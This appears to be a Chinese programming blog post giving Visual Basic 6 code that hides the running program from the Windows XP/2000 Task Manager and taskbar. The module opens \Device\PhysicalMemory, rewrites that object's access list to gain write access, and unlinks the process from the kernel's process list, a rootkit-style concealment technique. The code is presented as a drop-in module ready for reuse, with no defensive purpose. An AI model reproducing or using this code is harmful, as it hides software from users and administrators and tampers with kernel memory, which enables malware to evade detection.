Form中的代码
Private Sub Command1_Click() App.TaskVisible = False '任务栏隐藏 Call HideCurrentProcess '进程隐藏 End Sub
新建一个模块,代码如下:
view plaincopy to clipboardprint?
1. '-------------------------------------------------------------------------------------
2.
3. '模块名称:modHideProcess.bas
4.
5. '
6.
7. '模块功能:在 XP/2K 任务管理器的进程列表中隐藏当前进程
8.
9. '
10.
11. '使用方法:直接调用 HideCurrentProcess()
12.
13. '
14.
15. '模块作者:检索自互联网,原作者不详。
16.
17. '
18.
19. '修改日期:2006/08/26
20.
21. '---------------------------------------------------------------------------------------
22.
23.
24.
25. Option Explicit
26.
27.
28.
29. Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
30.
31. Private Const STATUS_ACCESS_DENIED = &HC0000022
32.
33. Private Const STATUS_INVALID_HandLE = &HC0000008
34.
35. Private Const ERROR_SUCCESS = 0&
36.
37. Private Const SECTION_MAP_WRITE = &H2
38.
39. Private Const SECTION_MAP_READ = &H4
40.
41. Private Const READ_CONTROL = &H20000
42.
43. Private Const WRITE_DAC = &H40000
44.
45. Private Const NO_INHERITANCE = 0
46.
47. Private Const DACL_SECURITY_INFORMATION = &H4
48.
49.
50.
51. Private Type IO_STATUS_BLOCK
52.
53. Status As Long
54.
55. Information As Long
56.
57. End Type
58.
59.
60.
61. Private Type UNICODE_STRING
62.
63. Length As Integer
64.
65. MaximumLength As Integer
66.
67. Buffer As Long
68.
69. End Type
70.
71.
72.
73. Private Const OBJ_INHERIT = &H2
74.
75. Private Const OBJ_PERMANENT = &H10
76.
77. Private Const OBJ_EXCLUSIVE = &H20
78.
79. Private Const OBJ_CASE_INSENSITIVE = &H40
80.
81. Private Const OBJ_OPENIF = &H80
82.
83. Private Const OBJ_OPENLINK = &H100
84.
85. Private Const OBJ_KERNEL_HandLE = &H200
86.
87. Private Const OBJ_VALID_ATTRIBUTES = &H3F2
88.
89.
90.
91. Private Type OBJECT_ATTRIBUTES
92.
93. Length As Long
94.
95. RootDirectory As Long
96.
97. ObjectName As Long
98.
99. Attributes As Long
100.
101. SecurityDeor As Long
102.
103. SecurityQualityOfService As Long
104.
105. End Type
106.
107.
108.
109. Private Type ACL
110.
111. AclRevision As Byte
112.
113. Sbz1 As Byte
114.
115. AclSize As Integer
116.
117. AceCount As Integer
118.
119. Sbz2 As Integer
120.
121. End Type
122.
123.
124.
125. Private Enum ACCESS_MODE
126.
127. NOT_USED_ACCESS
128.
129. GRANT_ACCESS
130.
131. SET_ACCESS
132.
133. DENY_ACCESS
134.
135. REVOKE_ACCESS
136.
137. SET_AUDIT_SUCCESS
138.
139. SET_AUDIT_FAILURE
140.
141. End Enum
142.
143.
144.
145. Private Enum MULTIPLE_TRUSTEE_OPERATION
146.
147. NO_MULTIPLE_TRUSTEE
148.
149. TRUSTEE_IS_IMPERSONATE
150.
151. End Enum
152.
153.
154.
155. Private Enum TRUSTEE_FORM
156.
157. TRUSTEE_IS_SID
158.
159. TRUSTEE_IS_NAME
160.
161. End Enum
162.
163.
164.
165. Private Enum TRUSTEE_TYPE
166.
167. TRUSTEE_IS_UNKNOWN
168.
169. TRUSTEE_IS_USER
170.
171. TRUSTEE_IS_GROUP
172.
173. End Enum
174.
175.
176.
177. Private Type TRUSTEE
178.
179. pMultipleTrustee As Long
180.
181. MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
182.
183. TrusteeForm As TRUSTEE_FORM
184.
185. TrusteeType As TRUSTEE_TYPE
186.
187. ptstrName As String
188.
189. End Type
190.
191.
192.
193. Private Type EXPLICIT_ACCESS
194.
195. grfAccessPermissions As Long
196.
197. grfAccessMode As ACCESS_MODE
198.
199. grfInheritance As Long
200.
201. TRUSTEE As TRUSTEE
202.
203. End Type
204.
205.
206.
207. Private Type AceArray
208.
209. List() As EXPLICIT_ACCESS
210.
211. End Type
212.
213.
214.
215. Private Enum SE_OBJECT_TYPE
216.
217. SE_UNKNOWN_OBJECT_TYPE = 0
218.
219. SE_FILE_OBJECT
220.
221. SE_SERVICE
222.
223. SE_PRINTER
224.
225. SE_REGISTRY_KEY
226.
227. SE_LMSHARE
228.
229. SE_KERNEL_OBJECT
230.
231. SE_WINDOW_OBJECT
232.
233. SE_DS_OBJECT
234.
235. SE_DS_OBJECT_ALL
236.
237. SE_PROVIDER_DEFINED_OBJECT
238.
239. SE_WMIGUID_OBJECT
240.
241. End Enum
242.
243.
244.
245. Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
246.
247. Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As Long
248.
249.
250.
251. Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long
252.
253. Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)
254.
255.
256.
257. Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING, ByVal SourceString As Long)
258.
259. Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
260.
261. Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
262.
263. Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
264.
265. Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
266.
267. Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As Long
268.
269. Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
270.
271. Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (LpVersionInformation As OSVERSIONINFO) As Long
272.
273.
274.
275. Private Type OSVERSIONINFO
276.
277. dwOSVersionInfoSize As Long
278.
279. dwMajorVersion As Long
280.
281. dwMinorVersion As Long
282.
283. dwBuildNumber As Long
284.
285. dwPlatformId As Long
286.
287. szCSDVersion As String * 128
288.
289. End Type
290.
291.
292.
293. Private verinfo As OSVERSIONINFO
294.
295.
296.
297. Private g_hNtDLL As Long
298.
299. Private g_pMapPhysicalMemory As Long
300.
301. Private g_hMPM As Long
302.
303. Private aByte(3) As Byte
304.
305.
306.
307. Public Sub HideCurrentProcess()
308.
309. '在进程列表中隐藏当前应用程序进程
310.
311.
312.
313. Dim thread As Long, process As Long, fw As Long, bw As Long
314.
315. Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long
316.
317.
318.
319. verinfo.dwOSVersionInfoSize = Len(verinfo)
320.
321. If (GetVersionEx(verinfo)) <>0 Then
322.
323. If verinfo.dwPlatformId = 2 Then
324.
325. If verinfo.dwMajorVersion = 5 Then
326.
327. Select Case verinfo.dwMinorVersion
328.
329. Case 0
330.
331. lOffsetFlink = &HA0
332.
333. lOffsetBlink = &HA4
334.
335. lOffsetPID = &H9C
336.
337. Case 1
338.
339. lOffsetFlink = &H88
340.
341. lOffsetBlink = &H8C
342.
343. lOffsetPID = &H84
344.
345. End Select
346.
347. End If
348.
349. End If
350.
351. End If
352.
353.
354.
355. If OpenPhysicalMemory <>0 Then
356.
357. thread = GetData(&HFFDFF124)
358.
359. process = GetData(thread + &H44)
360.
361. fw = GetData(process + lOffsetFlink)
362.
363. bw = GetData(process + lOffsetBlink)
364.
365. SetData fw + 4, bw
366.
367. SetData bw, fw
368.
369. CloseHandle g_hMPM
370.
371. End If
372.
373. End Sub
374.
375.
376.
377. Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
378.
379. Dim pDacl As Long
380.
381. Dim pNewDacl As Long
382.
383. Dim pSD As Long
384.
385. Dim dwRes As Long
386.
387. Dim ea As EXPLICIT_ACCESS
388.
389.
390.
391. GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD
392.
393.
394.
395. ea.grfAccessPermissions = SECTION_MAP_WRITE
396.
397. ea.grfAccessMode = GRANT_ACCESS
398.
399. ea.grfInheritance = NO_INHERITANCE
400.
401. ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
402.
403. ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
404.
405. ea.TRUSTEE.ptstrName = "CURRENT_USER" &vbNullChar
406.
407.
408.
409. SetEntriesInAcl 1, ea, pDacl, pNewDacl
410.
411.
412.
413. SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0
414.
415.
416.
417. CleanUp:
418.
419. LocalFree pSD
420.
421. LocalFree pNewDacl
422.
423. End Sub
424.
425.
426.
427. Private Function OpenPhysicalMemory() As Long
428.
429. Dim Status As Long
430.
431. Dim PhysmemString As UNICODE_STRING
432.
433. Dim Attributes As OBJECT_ATTRIBUTES
434.
435.
436.
437. RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory")
438.
439. Attributes.Length = Len(Attributes)
440.
441. Attributes.RootDirectory = 0
442.
443. Attributes.ObjectName = VarPtr(PhysmemString)
444.
445. Attributes.Attributes = 0
446.
447. Attributes.SecurityDeor = 0
448.
449. Attributes.SecurityQualityOfService = 0
450.
451.
452.
453. Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
454.
455. If Status = STATUS_ACCESS_DENIED Then
456.
457. Status = ZwOpenSection(g_hMPM, READ_CONTROL Or WRITE_DAC, Attributes)
458.
459. SetPhyscialMemorySectionCanBeWrited g_hMPM
460.
461. CloseHandle g_hMPM
462.
463. Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
464.
465. End If
466.
467.
468.
469. Dim lDirectoty As Long
470.
471. verinfo.dwOSVersionInfoSize = Len(verinfo)
472.
473. If (GetVersionEx(verinfo)) <>0 Then
474.
475. If verinfo.dwPlatformId = 2 Then
476.
477. If verinfo.dwMajorVersion = 5 Then
478.
479. Select Case verinfo.dwMinorVersion
480.
481. Case 0
482.
483. lDirectoty = &H30000
484.
485. Case 1
486.
487. lDirectoty = &H39000
488.
489. End Select
490.
491. End If
492.
493. End If
494.
495. End If
496.
497.
498.
499. If Status = 0 Then
500.
501. g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectoty, &H1000)
502.
503. If g_pMapPhysicalMemory <>0 Then OpenPhysicalMemory = g_hMPM
504.
505. End If
506.
507. End Function
508.
509.
510.
511. Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long
512.
513. Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long
514.
515. Dim lTemp As Long
516.
517.
518.
519. VAddr = addr
520.
521. CopyMemory aByte(0), VAddr, 4
522.
523. lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22))
524.
525.
526.
527. PGDE = BaseAddress + lTemp * 4
528.
529. CopyMemory PGDE, ByVal PGDE, 4
530.
531.
532.
533. If (PGDE And 1) <>0 Then
534.
535. lTemp = PGDE And &H80
536.
537. If lTemp <>0 Then
538.
539. PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF)
540.
541. Else
542.
543. PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE And &HFFFFF000, &H1000)
544.
545. lTemp = (VAddr And &H3FF000) / (2 ^ 12)
546.
547. PTE = PGDE + lTemp * 4
548.
549. CopyMemory PTE, ByVal PTE, 4
550.
551.
552.
553. If (PTE And 1) <>0 Then
554.
555. PAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF)
556.
557. UnmapViewOfFile PGDE
558.
559. End If
560.
561. End If
562.
563. End If
564.
565.
566.
567. LinearToPhys = PAddr
568.
569. End Function
570.
571.
572.
573. Private Function GetData(addr As Long) As Long
574.
575. Dim phys As Long, tmp As Long, ret As Long
576.
577.
578.
579. phys = LinearToPhys(g_pMapPhysicalMemory, addr)
580.
581. tmp = MapViewOfFile(g_hMPM, 4, 0, phys And &HFFFFF000, &H1000)
582.
583. If tmp <>0 Then
584.
585. ret = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4
586.
587. CopyMemory ret, ByVal ret, 4
588.
589.
590.
591. UnmapViewOfFile tmp
592.
593. GetData = ret
594.
595. End If
596.
597. End Function
598.
599.
600.
601. Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean
602.
603. Dim phys As Long, tmp As Long, x As Long
604.
605.
606.
607. phys = LinearToPhys(g_pMapPhysicalMemory, addr)
608.
609. tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys And &HFFFFF000, &H1000)
610.
611. If tmp <>0 Then
612.
613. x = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4
614.
615. CopyMemory ByVal x, data, 4
616.
617.
618.
619. UnmapViewOfFile tmp
620.
621. SetData = True
622.
623. End If
624.
625. End Function
626.
627.
628.
629. Private Function ByteArrToLong(inByte() As Byte) As Double
630.
631. Dim I As Integer
632.
633. For I = 0 To 3
634.
635. ByteArrToLong = ByteArrToLong + inByte(I) * (&H100 ^ I)
636.
637. Next I
638.
639. End Function
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)